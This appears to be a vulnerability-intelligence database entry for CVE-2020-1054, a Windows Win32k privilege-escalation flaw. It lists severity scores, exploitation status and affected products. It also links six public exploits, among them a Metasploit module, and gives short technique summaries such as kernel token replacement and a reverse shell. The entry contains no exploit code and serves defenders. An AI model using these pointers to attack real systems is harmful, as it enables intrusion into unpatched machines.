CVE-2020-1054

HIGH KEV

Windows - Local Privilege Escalation via Win32k Driver Memory Handling

Title source: llm
STIX 2.1

Exploitation Summary

CVE-2020-1054 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added November 3, 2021. EIP tracks 6 public exploits from researchers including 0xeb-bp, KaLendsi, Iamgublin, including a Metasploit module exploits/windows/local/cve_2020_1054_drawiconex_lpe.

AI-analyzed exploit summary This is a Rust-based local privilege escalation (LPE) exploit for CVE-2020-1054, targeting Windows 7 x64. It leverages a GDI object manipulation vulnerability to achieve arbitrary memory writes and escalate privileges.

Description

An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1143.

Exploits (6)

nomisec WORKING POC 85 stars
by 0xeb-bp · local
https://github.com/0xeb-bp/cve-2020-1054

This is a Rust-based local privilege escalation (LPE) exploit for CVE-2020-1054, targeting Windows 7 x64. It leverages a GDI object manipulation vulnerability to achieve arbitrary memory writes and escalate privileges.

Classification
Working Poc 95%
Attack Type
Lpe
Complexity
Complex
Reliability
Reliable
Target: Windows 7 x64 (pre-KB patch)
No auth needed
Prerequisites: Windows 7 x64 system without the specific KB patch · Local access to the target system
devstral-2 · analyzed Feb 16, 2026 Full analysis →
nomisec WORKING POC 20 stars
by KaLendsi · local
https://github.com/KaLendsi/CVE-2020-1054

This exploit leverages CVE-2020-1054, a Windows GDI privilege escalation vulnerability, by manipulating bitmap objects and abusing HMValidateHandle to achieve arbitrary code execution in the context of the SYSTEM user. The PoC includes shellcode injection and command execution via a reverse shell.

Classification
Working Poc 95%
Attack Type
Lpe
Complexity
Complex
Reliability
Reliable
Target: Windows 10 (and possibly other versions) with GDI component
No auth needed
Prerequisites: Local access to a vulnerable Windows system · Ability to execute arbitrary code on the target
devstral-2 · analyzed Feb 16, 2026 Full analysis →
nomisec WORKING POC 4 stars
by Iamgublin · poc
https://github.com/Iamgublin/CVE-2020-1054

This is a working proof-of-concept exploit for CVE-2020-1054, a Windows local privilege escalation vulnerability in the win32k.sys driver. The exploit leverages a bitmap memory corruption issue to achieve arbitrary read/write in kernel memory, ultimately replacing the current process token with the SYSTEM token.

Classification
Working Poc 95%
Attack Type
Lpe
Complexity
Complex
Reliability
Reliable
Target: Microsoft Windows (win32k.sys)
Auth required
Prerequisites: Local access to a vulnerable Windows system · Ability to execute arbitrary code
devstral-2 · analyzed Feb 16, 2026 Full analysis →
nomisec WORKING POC
by Graham382 · local
https://github.com/Graham382/CVE-2020-1054

This is a working proof-of-concept exploit for CVE-2020-1054, a Windows local privilege escalation vulnerability. It leverages a GDI object manipulation flaw to overwrite kernel memory and escalate privileges to SYSTEM by replacing the current process token with the system token.

Classification
Working Poc 95%
Attack Type
Lpe
Complexity
Complex
Reliability
Reliable
Target: Windows 7 (likely other versions as well)
Auth required
Prerequisites: Local access to a vulnerable Windows system · Ability to execute arbitrary code
devstral-2 · analyzed Feb 16, 2026 Full analysis →
metasploit WORKING POC NORMAL
by Netanel Ben-Simon, Yoav Alon, bee13oy, timwr · rubypocwin
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb

This Metasploit module exploits CVE-2020-1054, an out-of-bounds write vulnerability in the DrawIconEx function within win32k.sys, allowing local privilege escalation to SYSTEM on Windows 7 x64 SP1. It leverages controlled kernel memory writes to achieve arbitrary code execution.

Classification
Working Poc 100%
Attack Type
Lpe
Complexity
Complex
Reliability
Racy
Target: Microsoft Windows 7 x64 SP1 (win32k.sys)
No auth needed
Prerequisites: Local access to a vulnerable Windows 7 x64 SP1 system · Meterpreter session
devstral-2 · analyzed Feb 19, 2026 Full analysis →
patchapalooza WRITEUP
by Ascotbe · local
https://github.com/Ascotbe/Kernelhub

This repository contains documentation and metadata generation scripts for a collection of Windows kernel exploits, including CVE-2003-0352, CVE-2006-3439, and others. It does not include functional exploit code but provides structured documentation and configuration tools for organizing exploit information.

Classification
Writeup 90%
Attack Type
Other
Complexity
Moderate
Reliability
Theoretical
Target: Windows Kernel (various versions)
No auth needed
Prerequisites: access to the repository · Python environment for script execution
devstral-2 · analyzed Feb 23, 2026 Full analysis →

References (3)

Core 3

Scores

CVSS v3 7.8
EPSS 0.8121
EPSS Percentile 99.2%
Attack Vector LOCAL
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation active
Automatable no
Technical Impact total

Details

CISA KEV 2021-11-03
VulnCheck KEV 2020-10-19
InTheWild.io 2021-07-23
ENISA EUVD EUVD-2020-11947
CWE
CWE-787
Status published
Products (19)
microsoft/windows_10_1507 (2 CPE variants)
microsoft/windows_10_1607 (2 CPE variants)
microsoft/windows_10_1709 (3 CPE variants)
microsoft/windows_10_1803 (3 CPE variants)
microsoft/windows_10_1809 (3 CPE variants)
microsoft/windows_10_1903 (3 CPE variants)
microsoft/windows_10_1909 (3 CPE variants)
microsoft/windows_7
microsoft/windows_8.1
microsoft/windows_rt_8.1
... and 9 more
Published May 21, 2020
KEV Added Nov 03, 2021
Tracked Since Feb 18, 2026